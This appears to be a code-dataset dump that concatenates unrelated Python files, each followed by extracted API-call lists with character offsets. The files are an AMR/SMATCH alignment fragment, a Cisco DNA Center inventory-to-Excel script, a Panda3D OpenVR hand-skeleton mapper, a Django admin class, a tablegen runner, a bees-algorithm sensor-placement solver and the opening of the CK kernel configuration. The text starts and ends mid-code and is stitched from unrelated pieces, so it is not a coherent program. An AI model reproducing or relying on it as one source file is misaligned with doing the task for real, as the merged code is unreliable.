print("Inconsistency in computing: swap gain", cur_match_num, sw_gain, new_match_num,
file=ERROR_LOG)
if sw_gain > largest_gain:
largest_gain = sw_gain
node1 = i
node2 = j
use_swap = True
# generate a new mapping based on swap/move
cur_mapping = mapping[:]
if node1 is not None:
if use_swap:
if veryVerbose:
print("Use swap gain", file=DEBUG_LOG)
temp = cur_mapping[node1]
cur_mapping[node1] = cur_mapping[node2]
cur_mapping[node2] = temp
else:
if veryVerbose:
print("Use move gain", file=DEBUG_LOG)
cur_mapping[node1] = node2
else:
if veryVerbose:
print("no move/swap gain found", file=DEBUG_LOG)
if veryVerbose:
print("Original mapping", mapping, file=DEBUG_LOG)
print("Current mapping", cur_mapping, file=DEBUG_LOG)
return largest_gain, cur_mapping
def get_best_amr_match(cur_amr1, cur_amr2):
amr_pair = []
for i, cur_amr in (1, cur_amr1), (2, cur_amr2):
try:
amr_pair.append(amr.AMR.parse_AMR_line(cur_amr))
except Exception as e:
print("Error in parsing amr %d: %s" % (i, cur_amr), file=ERROR_LOG)
print("Please check if the AMR is ill-formatted. Ignoring remaining AMRs", file=ERROR_LOG)
print("Error message: %s" % e, file=ERROR_LOG)
amr1, amr2 = amr_pair
prefix1 = "a"
prefix2 = "b"
    # Rename nodes to "a1", "a2", etc.
node_maps_1 = rename_node(amr1, prefix1)
    # Rename nodes to "b1", "b2", etc.
node_maps_2 = rename_node(amr2, prefix2)
(instance1, attributes1, relation1) = amr1.get_triples()
(instance2, attributes2, relation2) = amr2.get_triples()
# optionally turn off some of the node comparison
doinstance = doattribute = dorelation = True
(best_mapping, best_match_num) = get_best_match(instance1, attributes1, relation1,
instance2, attributes2, relation2,
prefix1, prefix2, doinstance=doinstance,
doattribute=doattribute, dorelation=dorelation)
return best_mapping, instance1, attributes1, relation1, instance2, attributes2, relation2, node_maps_1, node_maps_2
def match_pair(pair):
"""
Get the best match
Args:
pair: a pair of amrs
Returns: the best matching amr
"""
amr1, amr2 = pair
match_triple_dict.clear() # clear the matching triple dictionary
ret = get_best_amr_match(amr1, amr2)
return ret
def get_entries(fname):
"""
Get AMR entries from files
Args:
fname: path to input
    Returns: original amr strings with meta info and amr strings without meta info
"""
with open(fname) as f:
data = f.read()
entries = []
original_entries = []
for e in data.split('\n\n'):
lines = [l.strip() for l in e.splitlines()]
lines = [l for l in lines if (l and not l.startswith('#'))]
string = ' '.join(lines)
string = string.replace('\t', ' ') # replace tabs with a space
string = re.sub(' +', ' ', string) # squeeze multiple spaces into a single
if string:
entries.append( string )
original_entries.append(e)
return original_entries, entries
def align(original_gold_entries, original_test_entries, test_entries):
"""
    Align test entries with gold entries so that the test entries contain the same number of AMRs as the gold
    entries and are kept in the same order; this allows the SMATCH score calculation to run properly.
Args:
original_gold_entries: gold entries
original_test_entries: original test entries with all meta info
test_entries: test entries without meta info
Returns: alined test entries
"""
test_ids = {}
i = 0
c = 0
for g in original_test_entries:
g = penman.decode(g, model=NoOpModel())
c += duplicate_count(g)
if 'id' in g.metadata:
gid = g.metadata['id']
test_ids[gid] = i
i += 1
    print("duplicate triple count in test entries:", c)
align_test_entries=[]
num_triples = 0
for g in original_gold_entries:
g = penman.decode(g, model=NoOpModel())
num_triples += len(g.triples)
gid = g.metadata['id']
if gid in test_ids:
align_test_entries.append(test_entries[test_ids[gid]])
else:
# the prediction file does not contain an amr with the given gold gid, add a dummy amr
align_test_entries.append('(z0 / end-01)')
print("Average gold graph size (# triples)", num_triples/len(original_gold_entries))
return align_test_entries
def duplicate_count(g):
triples = {}
c = 0
for t in g.triples:
it = inverse(t)
if t in triples or it in triples:
triples[t] += 1
else:
triples[t] = 1
triples[it] = 1
for t, k in triples.items():
if k > 1:
c += k
return c
def inverse(t):
r = t[1]
if r.endswith('-of'):
return (t[2], r[:-3], t[0])
elif r == ':mod':
return (t[2], ':domain', t[0])
elif r == ':domain':
return (t[2], ':mod', t[0])
else:
return (t[2], r + '-of', t[0])
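# Illustrative inversions:
#   inverse(('b', 'ARG0-of', 'g')) -> ('g', 'ARG0', 'b')
#   inverse(('c', ':mod', 'd'))    -> ('d', ':domain', 'c')
#   inverse(('c', ':domain', 'd')) -> ('d', ':mod', 'c')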
|
[
"penman.models.noop.NoOpModel",
"random.seed",
"amr.AMR.parse_AMR_line",
"re.sub"
] |
[((12328, 12341), 'random.seed', 'random.seed', ([], {}), '()\n', (12339, 12341), False, 'import random\n'), ((14109, 14122), 'random.seed', 'random.seed', ([], {}), '()\n', (14120, 14122), False, 'import random\n'), ((28525, 28550), 're.sub', 're.sub', (['""" +"""', '""" """', 'string'], {}), "(' +', ' ', string)\n", (28531, 28550), False, 'import re\n'), ((26422, 26453), 'amr.AMR.parse_AMR_line', 'amr.AMR.parse_AMR_line', (['cur_amr'], {}), '(cur_amr)\n', (26444, 26453), False, 'import amr\n'), ((29360, 29371), 'penman.models.noop.NoOpModel', 'NoOpModel', ([], {}), '()\n', (29369, 29371), False, 'from penman.models.noop import NoOpModel\n'), ((29646, 29657), 'penman.models.noop.NoOpModel', 'NoOpModel', ([], {}), '()\n', (29655, 29657), False, 'from penman.models.noop import NoOpModel\n')]
|
# imports
from datetime import date
import requests
import xlsxwriter
from requests.auth import HTTPBasicAuth as BasicAuth
# inputs
url = "https://sandboxdnac.cisco.com/dna/system/api/v1/auth/token"
username = "devnetuser"
password = "<PASSWORD>!"
headers = {"Content-Type": "application/json", "Accept": "application/json"}
# processing
try:
r = requests.post(url, headers=headers, auth=BasicAuth(username, password))
r.raise_for_status() # raise the exception if HTTP Status Code is NOT 200
except Exception as e:
raise SystemExit(e)
else:
print("Successfully authenticated and generated a token")
# output
token = r.json()["Token"]
# inputs
url = "https://sandboxdnac.cisco.com/dna/intent/api/v1/network-device"
headers = {"X-Auth-Token": token, **headers}
# processing
r = requests.get(url, headers=headers)
print("Received the device list facts from DNA")
# output
facts = r.json()["response"]
# the header row
header = {
"A1": "Device Hostname",
"B1": "MGMT IP Address",
"C1": "Serial Number",
"D1": "Software Version",
"E1": "Device Model",
"F1": "Device Role",
}
# create a workbook and add a worksheet
wb = xlsxwriter.Workbook(f"DNA-Devices-Facts_{date.today()}.xlsx")
ws = wb.add_worksheet("DNA Devices Facts")
# write the header in the worksheet
for cell, value in header.items():
ws.write(cell, value)
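# Note: xlsxwriter's write() accepts both A1-style addresses (used for the
# header above) and zero-indexed (row, col) pairs (used for the data rows
# below).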
# fine tune the worksheet
ws.autofilter("A1:F1")
ws.freeze_panes(1, 2)
row, col = 1, 0
# write the facts in the worksheet
for fact in facts:
ws.write(row, col + 0, fact["hostname"])
ws.write(row, col + 1, fact["managementIpAddress"])
ws.write(row, col + 2, fact["serialNumber"])
ws.write(row, col + 3, fact["softwareVersion"])
ws.write(row, col + 4, fact["platformId"])
ws.write(row, col + 5, fact["role"])
# jump to next row
row += 1
# save the workbook
wb.close()
print("Successfully created the workbook")
print("SUCCESS")
|
[
"requests.auth.HTTPBasicAuth",
"datetime.date.today",
"requests.get"
] |
[((827, 861), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (839, 861), False, 'import requests\n'), ((395, 424), 'requests.auth.HTTPBasicAuth', 'BasicAuth', (['username', 'password'], {}), '(username, password)\n', (404, 424), True, 'from requests.auth import HTTPBasicAuth as BasicAuth\n'), ((1291, 1303), 'datetime.date.today', 'date.today', ([], {}), '()\n', (1301, 1303), False, 'from datetime import date\n')]
|
from direct.actor.Actor import Actor
from .definitions import HandSkeletonBone
class HandSkeleton:
"""
Helper class that will map the skeleton received from OpenVR onto the bones of the model of the hand.
"""
def __init__(self, ovr, action, joint_map, part_name="modelRoot"):
"""
* ovr : Reference to the instance of P3DOpenVR.
* action : Handler of the action holding the bone transforms of the hand
* joint_map : Dictionary that maps the joints of the model onto the bones of the OpenVR skeleton
* part_name : Name of the root node in the model that contains the joints.
"""
self.ovr = ovr
self.action = action
self.joint_map = joint_map
self.part_name = part_name
self.control_map = {}
self.model = None
def set_model(self, model):
"""
Attach the given model to the skeleton.
* model : Instance of the model of the hand.
"""
if not isinstance(model, Actor):
model = Actor(model, copy=False)
self.model = model
self.build_control_map()
def build_control_map(self):
"""
Retrieve the control joints in the model of the hand and map them onto the bones of the skeleton.
"""
self.control_map = {}
for (joint_name, bone_index) in self.joint_map.items():
joint_control = self.model.control_joint(None, self.part_name, joint_name)
if joint_control is not None:
self.control_map[bone_index] = joint_control
else:
print("Joint '{}' not found or found multiple times".format(joint_name))
def set_default_pose(self, pose):
pass
def update(self):
"""
Retrieve the transforms for all the bone and update the linked control joints.
This method should be called each frame after the main pose update task.
"""
bone_transform_array, device_path = self.ovr.get_skeletal_bone_data(self.action)
if bone_transform_array is not None:
for (bone_index, joint_control) in self.control_map.items():
transform_mat = self.ovr.get_bone_transform_mat(bone_transform_array, bone_index)
joint_control.set_mat(transform_mat)
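# Hedged usage sketch (illustrative, not part of the API): given a P3DOpenVR
# instance `ovr` and a skeletal action handle `action`,
#   skeleton = DefaultLeftHandSkeleton(ovr, action)
#   skeleton.set_model(left_hand_model)   # an Actor or a plain model node
#   # ...then call skeleton.update() once per frame, after the pose update.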
class DefaultLeftHandSkeleton(HandSkeleton):
"""
Helper class that will map the default model of the left hand from Valve to the bones of the skeleton.
"""
default_joint_map = {
'wrist_l': HandSkeletonBone.Wrist,
'finger_thumb_0_l': HandSkeletonBone.Thumb0,
'finger_thumb_1_l': HandSkeletonBone.Thumb1,
'finger_thumb_2_l': HandSkeletonBone.Thumb2,
'finger_thumb_l_end': HandSkeletonBone.Thumb3,
'finger_index_meta_l': HandSkeletonBone.IndexFinger0,
'finger_index_0_l': HandSkeletonBone.IndexFinger1,
'finger_index_1_l': HandSkeletonBone.IndexFinger2,
'finger_index_2_l': HandSkeletonBone.IndexFinger3,
'finger_index_l_end': HandSkeletonBone.IndexFinger4,
'finger_middle_meta_l': HandSkeletonBone.MiddleFinger0,
'finger_middle_0_l': HandSkeletonBone.MiddleFinger1,
'finger_middle_1_l': HandSkeletonBone.MiddleFinger2,
'finger_middle_2_l': HandSkeletonBone.MiddleFinger3,
'finger_middle_l_end': HandSkeletonBone.MiddleFinger4,
'finger_ring_meta_l': HandSkeletonBone.RingFinger0,
'finger_ring_0_l': HandSkeletonBone.RingFinger1,
'finger_ring_1_l': HandSkeletonBone.RingFinger2,
'finger_ring_2_l': HandSkeletonBone.RingFinger3,
'finger_ring_l_end': HandSkeletonBone.RingFinger4,
'finger_pinky_meta_l': HandSkeletonBone.PinkyFinger0,
'finger_pinky_0_l': HandSkeletonBone.PinkyFinger1,
'finger_pinky_1_l': HandSkeletonBone.PinkyFinger2,
'finger_pinky_2_l': HandSkeletonBone.PinkyFinger3,
'finger_pinky_l_end': HandSkeletonBone.PinkyFinger4
}
def __init__(self, ovr, action):
HandSkeleton.__init__(self, ovr, action, self.default_joint_map)
class DefaultRightHandSkeleton(HandSkeleton):
"""
Helper class that will map the default model of the right hand from Valve to the bones of the skeleton.
"""
default_joint_map = {
'wrist_r': HandSkeletonBone.Wrist,
'finger_thumb_0_r': HandSkeletonBone.Thumb0,
'finger_thumb_1_r': HandSkeletonBone.Thumb1,
'finger_thumb_2_r': HandSkeletonBone.Thumb2,
'finger_thumb_r_end': HandSkeletonBone.Thumb3,
'finger_index_meta_r': HandSkeletonBone.IndexFinger0,
'finger_index_0_r': HandSkeletonBone.IndexFinger1,
'finger_index_1_r': HandSkeletonBone.IndexFinger2,
'finger_index_2_r': HandSkeletonBone.IndexFinger3,
'finger_index_r_end': HandSkeletonBone.IndexFinger4,
'finger_middle_meta_r': HandSkeletonBone.MiddleFinger0,
'finger_middle_0_r': HandSkeletonBone.MiddleFinger1,
'finger_middle_1_r': HandSkeletonBone.MiddleFinger2,
'finger_middle_2_r': HandSkeletonBone.MiddleFinger3,
'finger_middle_r_end': HandSkeletonBone.MiddleFinger4,
'finger_ring_meta_r': HandSkeletonBone.RingFinger0,
'finger_ring_0_r': HandSkeletonBone.RingFinger1,
'finger_ring_1_r': HandSkeletonBone.RingFinger2,
'finger_ring_2_r': HandSkeletonBone.RingFinger3,
'finger_ring_r_end': HandSkeletonBone.RingFinger4,
'finger_pinky_meta_r': HandSkeletonBone.PinkyFinger0,
'finger_pinky_0_r': HandSkeletonBone.PinkyFinger1,
'finger_pinky_1_r': HandSkeletonBone.PinkyFinger2,
'finger_pinky_2_r': HandSkeletonBone.PinkyFinger3,
'finger_pinky_r_end': HandSkeletonBone.PinkyFinger4
}
def __init__(self, ovr, action):
HandSkeleton.__init__(self, ovr, action, self.default_joint_map)
|
[
"direct.actor.Actor.Actor"
] |
[((1046, 1070), 'direct.actor.Actor.Actor', 'Actor', (['model'], {'copy': '(False)'}), '(model, copy=False)\n', (1051, 1070), False, 'from direct.actor.Actor import Actor\n')]
|
from django.contrib import admin
from .models import Timer
class TimerAdmin(admin.ModelAdmin):
list_display =('datetime', 'user', 'event', 'item_pk',
'item_name', 'other_info', 'referrer')
list_per_page = 1000
admin.site.register(Timer, TimerAdmin)
|
[
"django.contrib.admin.site.register"
] |
[((239, 277), 'django.contrib.admin.site.register', 'admin.site.register', (['Timer', 'TimerAdmin'], {}), '(Timer, TimerAdmin)\n', (258, 277), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/env python3
"""Runs tablegen."""
import subprocess
import sys
# Prefix with ./ to run built binary, not arbitrary stuff from PATH.
sys.exit(subprocess.call(['./' + sys.argv[1]] + sys.argv[2:]))
|
[
"subprocess.call"
] |
[((153, 205), 'subprocess.call', 'subprocess.call', (["(['./' + sys.argv[1]] + sys.argv[2:])"], {}), "(['./' + sys.argv[1]] + sys.argv[2:])\n", (168, 205), False, 'import subprocess\n')]
|
from collections import namedtuple
from random import randrange, choice, random
from copy import deepcopy
SensorState = namedtuple('SensorState', 'terrain, sensors, coverage')
# Functions for the sensors #
def get_covered_signal_points(state: SensorState, sensor: int) -> list:
covered = get_all_covered_points(state, sensor)
return [(x, y) for x, y in covered if state.terrain[x][y] == 1]
def get_all_covered_points(state: SensorState, sensor: int) -> list:
current_sensor = state.sensors[sensor]
current_coverage = state.coverage[sensor]
covered_points = []
max_rows = len(state.terrain)
max_columns = len(state.terrain[0])
for i in range(current_coverage):
current_row = current_sensor[0] + i
if current_row <= max_rows - 1:
for j in range(current_coverage):
current_column = current_sensor[1] + j
if current_column <= max_columns - 1:
covered_points.append((current_row, current_column))
return covered_points
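# Note: a sensor with coverage c watches the c-by-c block of cells starting
# at its own (row, column) and extending toward larger indices, clipped at
# the grid edge; e.g. a sensor at (4, 4) with coverage 3 on the 6x6 terrain
# covers only the 2x2 block spanning rows 4..5 and columns 4..5.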
def get_possible_actions(state: SensorState, sensor: int) -> list:
actions = []
current_sensor = state.sensors[sensor]
max_rows = len(state.terrain)
max_columns = len(state.terrain[0])
# Left
if current_sensor[1] > 0:
actions.append((current_sensor[0], current_sensor[1] - 1))
# Right
if current_sensor[1] < (max_columns - 1):
actions.append((current_sensor[0], current_sensor[1] + 1))
# Up
if current_sensor[0] > 0:
actions.append((current_sensor[0] - 1, current_sensor[1]))
# Down
if current_sensor[0] < (max_rows - 1):
actions.append((current_sensor[0] + 1, current_sensor[1]))
return actions
def print_coverage(state: SensorState) -> None:
to_print = state.terrain.copy()
to_print = [['-' if element == 1 else 'X' for element in row] for row in to_print]
print_terrain(to_print)
for i in range(len(state.sensors)):
covered_points = get_all_covered_points(state, i)
for index, tup in enumerate(covered_points):
to_print[tup[0]][tup[1]] = '#' if to_print[tup[0]][tup[1]] == 'X' else i
print("\n")
print_terrain(to_print)
def print_terrain(terrain):
print("", end=" ")
for i in range(len(terrain[0])):
print(i, end=" ")
print("")
for i in range(len(terrain)):
print(i, end=" ")
for j in range(len(terrain[i])):
print(terrain[i][j], end=" ")
print("")
# Functions for the bee algorithm #
def objective_function(state):
coverage = set()
for i in range(len(state.sensors)):
coverage.update(get_covered_signal_points(state, i))
return len(coverage)
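# The objective counts *distinct* signal points covered: `coverage` is a set,
# so points watched by several sensors are only counted once.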
def create_random_bee(search_space: tuple) -> dict:
"""create a random bee position"""
positions = [(randrange(len(search_space[0])), randrange(len(search_space[0][0])))
for _ in range(len(search_space[1]))]
return {'state': SensorState(terrain=search_space[0], coverage=search_space[1], sensors=positions), 'fitness': None}
def create_neigh_bee(state: SensorState, patch_size, search_space):
"""create a bee inside a neighborhood"""
positions = deepcopy(state.sensors)
possible_modifications = [i for i in range(len(positions))]
for _ in range(patch_size):
to_modify = choice(possible_modifications)
actions = get_possible_actions(state, to_modify)
positions[to_modify] = choice(actions)
possible_modifications.remove(to_modify)
return {'state': SensorState(terrain=search_space[0], coverage=search_space[1], sensors=positions), 'fitness': None}
def search_neigh(parent, neigh_size, patch_size, search_space):
"""search inside the neighborhood of a site"""
neigh = []
for i in range(neigh_size):
bee = create_neigh_bee(parent['state'], patch_size, search_space)
bee['fitness'] = objective_function(bee['state'])
neigh.append(bee)
neigh.sort(key=lambda b: b['fitness'], reverse=True)
return neigh[0]
def create_scout_bees(search_space, num_scouts):
"""creates scout bees for new sites"""
return [create_random_bee(search_space) for _ in range(num_scouts)]
def bees_algorithm(max_gens, search_space, num_bees, num_sites,
elite_sites, patch_size, patch_dec, e_bees, o_bees):
"""implements the Bees algorithm"""
best = None
pop = [create_random_bee(search_space) for _ in range(num_bees)]
for gen in range(max_gens):
for bee in range(num_bees):
pop[bee]['fitness'] = objective_function(pop[bee]['state'])
pop.sort(key=lambda b: b['fitness'], reverse=True)
if not best or pop[0]['fitness'] > best['fitness']:
best = pop[0]
print("Now the best is {}".format(pop[0]['state'].sensors))
next_gen = []
for i, parent in enumerate(pop[:num_sites]):
neigh_size = e_bees if i < elite_sites else o_bees
next_gen.append(search_neigh(parent, neigh_size, patch_size,
search_space))
scouts = create_scout_bees(search_space, num_bees - num_sites)
pop = next_gen + scouts
if patch_dec > random():
patch_size = patch_size - 1
print(" > it=%d, patch_size=%g, f=%g" % (gen + 1, patch_size, best['fitness']))
return best
# problem configuration
terr = [[1, 1, 0, 0, 1, 0],
[1, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1],
[1, 1, 1, 1, 0, 0]]
cov = [3, 2, 2, 1] # coverage (square size) of each of the four sensors
search_space = (terr, cov)
# algorithm configuration
max_gens = 20 # maximum number of generations
num_bees = 45 # total bees in the population
num_sites = 3 # number of best sites selected for neighbourhood search
elite_sites = 1 # number of those sites treated as elite
patch_size = 3 # initial neighbourhood patch size
patch_dec = 0.05 # probability of shrinking the patch size after a generation
e_bees = 7 # bees recruited to each elite site
o_bees = 2 # bees recruited to each other site
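# With these settings each generation keeps the best bee from 3 neighbourhood
# searches (1 elite site searched by 7 bees, 2 other sites by 2 bees each)
# and refills the population with 45 - 3 = 42 fresh scouts.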
# execute the algorithm
result = bees_algorithm(max_gens, search_space, num_bees, num_sites,
elite_sites, patch_size, patch_dec, e_bees, o_bees)
print("Best result is {} with value of {}".format(result["state"].sensors, result["fitness"]))
print_coverage(result["state"])
|
[
"random.random",
"copy.deepcopy",
"random.choice",
"collections.namedtuple"
] |
[((121, 176), 'collections.namedtuple', 'namedtuple', (['"""SensorState"""', '"""terrain, sensors, coverage"""'], {}), "('SensorState', 'terrain, sensors, coverage')\n", (131, 176), False, 'from collections import namedtuple\n'), ((3198, 3221), 'copy.deepcopy', 'deepcopy', (['state.sensors'], {}), '(state.sensors)\n', (3206, 3221), False, 'from copy import deepcopy\n'), ((3338, 3368), 'random.choice', 'choice', (['possible_modifications'], {}), '(possible_modifications)\n', (3344, 3368), False, 'from random import randrange, choice, random\n'), ((3457, 3472), 'random.choice', 'choice', (['actions'], {}), '(actions)\n', (3463, 3472), False, 'from random import randrange, choice, random\n'), ((5222, 5230), 'random.random', 'random', ([], {}), '()\n', (5228, 5230), False, 'from random import randrange, choice, random\n')]
|
#
# Collective Knowledge (CK)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: <NAME>
#
# This is the kernel of CK. It is implemented in just one file
# with a minimal set of common portable functions and without OO
# to make it simpler to re-implement it in any another language if needed.
# For example, we implemented some functions in Java, C, C++ and Fortran
# (see our xOpenME library used in Android)
__version__ = "1.12.3.3" # We use 3 digits for the main (released) version and 4th digit for development revision
# Do not use characters (to detect outdated version)!
# Extra modules global for the whole kernel
import sys
import json
import os
import imp # Loading Python modules
initialized=False # True if initialized
allow_print=True # Needed to suppress all output
con_encoding='' # Use non-default console encoding
# This configuration dictionary will be overloaded at run-time
# from the CK entry default:kernel:default (from this CK distro)
# and then from the local:kernel:default (from a local user repository)
cfg={
"name":"Collective Knowledge",
"desc":"exposing ad-hoc experimental setups to extensible repository and big data predictive analytics",
"cmd":"ck <action> $#module_uoa#$ (cid1/uid1) (cid2/uid2) (cid3/uid3) key_i=value_i ... @file.json",
"wiki_data_web":"https://cKnowledge.io/c/", # Collective Knowledge Base (ckb)
"private_wiki_data_web":"https://github.com/ctuning/ck/wiki/ckb_", # Collective Knowledge Base (ckb)
"api_web":"https://cKnowledge.io/c/module/",
"status_url":"https://raw.githubusercontent.com/ctuning/ck/master/setup.py",
"help_examples":" Example of obtaining, compiling and running a shared benchmark on Linux with GCC:\n $ ck pull repo:ctuning-programs\n $ ck compile program:cbench-automotive-susan --speed\n $ ck run program:cbench-automotive-susan\n\n Example of an interactive CK-powered article:\n http://cknowledge.org/repo\n",
"help_web":" Documentation:\n https://github.com/ctuning/ck/wiki",
"ck_web":"https://github.com/ctuning/ck",
"ck_web_wiki":"https://github.com/ctuning/ck/wiki",
"default_shared_repo_url":"https://github.com/ctuning",
"github_repo_url":"https://github.com",
# "default_license":"See CK LICENSE.txt for licensing details",
# "default_copyright":"See CK COPYRIGHT.txt for copyright details",
# "default_developer":"cTuning foundation",
# "default_developer_email":"<EMAIL>",
# "default_developer_webpage":"http://cTuning.org",
"detect_cur_cid":"#",
"detect_cur_cid1":"^",
"error":"CK error: ",
"json_sep":"*** ### --- CK JSON SEPARATOR --- ### ***",
"default_module":"data",
"module_name":"module",
"module_uids":["032630d041b4fd8a"],
"repo_name":"repo",
"module_code_name":"module",
"module_full_code_name":"module.py",
"env_key_root":"CK_ROOT",
"env_key_local_repo":"CK_LOCAL_REPO",
"env_key_local_kernel_uoa":"CK_LOCAL_KERNEL_UOA",
"env_key_default_repo":"CK_DEFAULT_REPO",
"env_key_repos":"CK_REPOS",
"subdir_default_repos":"repos",
"user_home_dir_ext":"CK", # if no path to repos is defined, use user home dir with this extension
"kernel_dir":"ck",
"kernel_dirs":["ck",""],
"file_kernel_py":"ck/kernel.py",
"subdir_default_repo":"repo",
"subdir_kernel":"kernel",
"subdir_kernel_default":"default",
"subdir_ck_ext":".cm", # keep compatibility with Collective Mind V1.x
"file_for_lock":"ck_lock.txt",
"special_directories":[".cm", ".svn", ".git"], # special directories that should be ignored when copying/moving entries
"ignore_directories_when_archive_repo":[".svn", ".git"],
"file_meta_old":"data.json", # keep compatibility with Collective Mind V1.x
"file_meta":"meta.json",
"file_info":"info.json",
"file_desc":"desc.json",
"file_updates":"updates.json",
"file_alias_a": "alias-a-",
"file_alias_u": "alias-u-",
"linux_sudo":"sudo",
"install_ck_as_lib":"python setup.py install",
"repo_file":".ckr.json",
"file_cache_repo_uoa":".ck.cache_repo_uoa.json",
"file_cache_repo_info":".ck.cache_repo_info.json",
"default_host":"localhost",
"default_port":"3344",
"detached_console":{"win":{"cmd":"start $#cmd#$", "use_create_new_console_flag":"yes"},
"linux":{"cmd":"xterm -hold -e \"$#cmd#$\""}},
"batch_extension":{"win":".bat",
"linux":".sh"},
"default_archive_name":"ck-archive.zip",
# TODO: remove "http://"?
"index_host":"http://localhost",
"index_port":"9200",
"index_use_curl":"no",
"cknowledge_api":"https://cKnowledge.io/api/v1/?",
# "download_missing_components":"yes",
"check_missing_modules":"yes",
"wfe_template":"default",
"module_repo_name":"repo",
"repo_name_default":"default",
"repo_uid_default":"604419a9fcc7a081",
"repo_name_local":"local",
"repo_uid_local":"9a3280b14a4285c9",
"default_exchange_repo_uoa":"remote-ck",
"default_exchange_subrepo_uoa":"upload",
"external_editor":{"win":"wordpad $#filename#$",
"linux":"vim $#filename#$"},
"shell":{"linux":{
"redirect_stdout":">",
"env_separator": ";"
},
"win": {
"redirect_stdout":">",
"env_separator": "&&"
}
},
"forbid_global_delete": "no",
"forbid_global_writing": "no",
"forbid_writing_modules": "no",
"forbid_writing_to_default_repo": "no",
"forbid_writing_to_local_repo": "no",
"allow_writing_only_to_allowed": "no",
"allow_run_only_from_allowed_repos": "no",
"repo_uids_to_allow_run":["604419a9fcc7a081",
"9a3280b14a4285c9",
"76c4424a1473c873",
"a4328ba99679e0d1",
"7fd7e76e13f4cd6a",
"215d441c19db1fed",
"<KEY>"],
"use_indexing": "no",
"internal_keys": [
"action",
"repo_uoa",
"module_uoa",
"data_uoa",
"cid",
"cids",
"cid1",
"cid2",
"cid3",
"xcids",
"unparsed_cmd",
"con_encoding",
"ck_profile",
"out",
"out_file"
],
"repo_types":{
"git":{
"clone":"git clone $#url#$ $#path#$",
"pull":"git pull",
"push":"git push",
"add":"git add $#files#$",
"rm":"git rm -rf $#files#$",
"commit":"git commit *",
"version":"git --version",
"checkout":"git checkout $#id#$"
}
},
"actions":{
"uid":{"desc":"generate UID", "for_web": "yes"},
"version":{"desc":"print CK version", "for_web": "yes"},
"python_version":{"desc":"print python version used by CK", "for_web": "no"},
"status":{"desc":"check CK version status", "for_web": "yes"},
"copy_path_to_clipboard":{"desc":"copy current path to clipboard", "for_web": "no"},
"wiki":{"desc":"<CID> open discussion wiki page for a given entry"}, # Collective Knowledge Base (ckb)
"pwiki":{"desc":"<CID> open private discussion wiki page for a given entry"},
"help":{"desc":"<CID> print help about data (module) entry"},
"short_help":{"desc":"<CID> print short help about CK"},
"webhelp":{"desc":"<CID> open browser with online help (description) for a given CK entry"},
"webapi":{"desc":"<CID> open browser with online API for a given module"},
"guide":{"desc":"open CK wiki with user/developer guides"},
"info":{"desc":"<CID> print help about module"},
"browser":{"desc":"start CK web service and open browser"},
"add":{"desc":"<CID> add entry", "for_web":"yes"},
"update":{"desc":"<CID> update entry", "for_web":"yes"},
"load":{"desc":"<CID> load meta description of entry", "for_web": "yes"},
"edit":{"desc":"<CID> edit entry description using external editor", "for_web":"no"},
"zip":{"desc":"<CID> zip entries", "for_web":"no"},
"find":{"desc":"<CID> find path to entry"},
"cd":{"desc":"<CID> print 'cd {path to entry}'"},
"cdc":{"desc":"<CID> print 'cd {path to entry} and copy to clipboard, if supported"},
"path":{"desc":"<CID> detect CID in the current directory"},
"cid":{"desc":"<CID> get CID of the current entry"},
"rm":{"desc":"<CID> delete entry", "for_web":"yes"},
"remove":{"desc":"see 'rm'", "for_web":"yes"},
"delete":{"desc":"see 'rm'", "for_web":"yes"},
"ren":{"desc":"<CID> <new name) (data_uid) (remove_alias) rename entry", "for_web":"yes"},
"rename":{"desc":"see 'ren' function", "for_web":"yes"},
"cp":{"desc":"<CID> <CID1> copy entry", "for_web":"yes"},
"copy":{"desc":"see 'cp'", "for_web":"yes"},
"mv":{"desc":"<CID> <CID1> move entry", "for_web":"yes"},
"move":{"desc":"see 'mv'", "for_web":"yes"},
"list_files":{"desc":" list files recursively in a given entry", "for_web": "yes"},
"delete_file":{"desc":"<file> delete file from a given entry", "for_web":"yes"},
"list":{"desc":"<CID> list entries", "for_web": "yes"},
"ls":{"desc":"see 'list'", "for_web": "yes"},
"search":{"desc":"<CID> search entries", "for_web": "yes"},
"pull":{"desc":"<CID> (filename) or (empty to get the whole entry as archive) pull file from entry"},
"push":{"desc":"<CID> (filename) push file to entry"},
"add_action":{"desc":"add action (function) to existing module"},
"remove_action":{"desc":"remove action (function) from existing module"},
"list_actions":{"desc":"list actions (functions) in existing module", "for_web":"yes"},
"add_index":{"desc":"<CID> add index"},
"delete_index":{"desc":"<CID> remove index"},
"convert_cm_to_ck":{"desc":"<CID> convert old CM entries to CK entries"},
"create_entry":{"desc":"<directory> create an entry for a given directory name"},
"get_api":{"desc":"--func=<func> print API of a function in a given module"},
"download":{"desc":"<CID> attempt to download entry from remote host (experimental)", "for_web": "yes"},
"print_input":{"desc":"prints input"},
},
"actions_redirect":{"list":"list_data2",
"ls":"list_data2"},
"common_actions":["webhelp", "webapi", "help", "info", "print_input",
"wiki",
"path", "find", "cid", "cd", "cdc",
"browser",
"add",
"edit",
"load",
"zip",
"rm", "remove", "delete",
"update",
"ren", "rename",
"cp", "copy",
"mv", "move",
"ls",
"list",
"search",
"pull",
"push",
"list_files",
"delete_file",
"add_action",
"remove_action",
"list_actions",
"create_entry",
"add_index",
"delete_index",
"get_api",
"download",
"convert_cm_to_ck"]
}
work={
"env_root":"", # Path to CK installation
"dir_default_repo":"",
"dir_default_repo_path":"",
"dir_default_kernel":"",
"dir_default_cfg":"",
"dir_local_repo":"",
"dir_local_repo_path":"",
"dir_local_kernel":"",
"dir_local_cfg":"",
"local_kernel_uoa":"",
"dir_work_repo":"",
"dir_work_repo_path":"",
"dir_work_cfg":"",
"dir_repos":"",
"dir_cache_repo_uoa":"",
"dir_cache_repo_info":"",
"repo_name_work":"",
"repo_uid_work":"",
'cached_module_by_path':{},
'cached_module_by_path_last_modification':{}
}
paths_repos=[]        # First path to local repo (if it exists), then global
cache_repo_init=False # True, if initialized
paths_repos_all=[] # Path to all repos
cache_repo_uoa={} # Disambiguate repo UOA to repo UID
cache_repo_info={} # Cache repo info with path and type
type_long=None # In Python 3 -> int, in Python 2 -> long
string_io=None # StringIO, which is imported differently in Python 2 and 3
log_ck_entries=False # If true, log CK entries to record all dependencies
##############################################################################
# Save CK state
#
# TARGET: end users
def save_state():
"""
Input: None
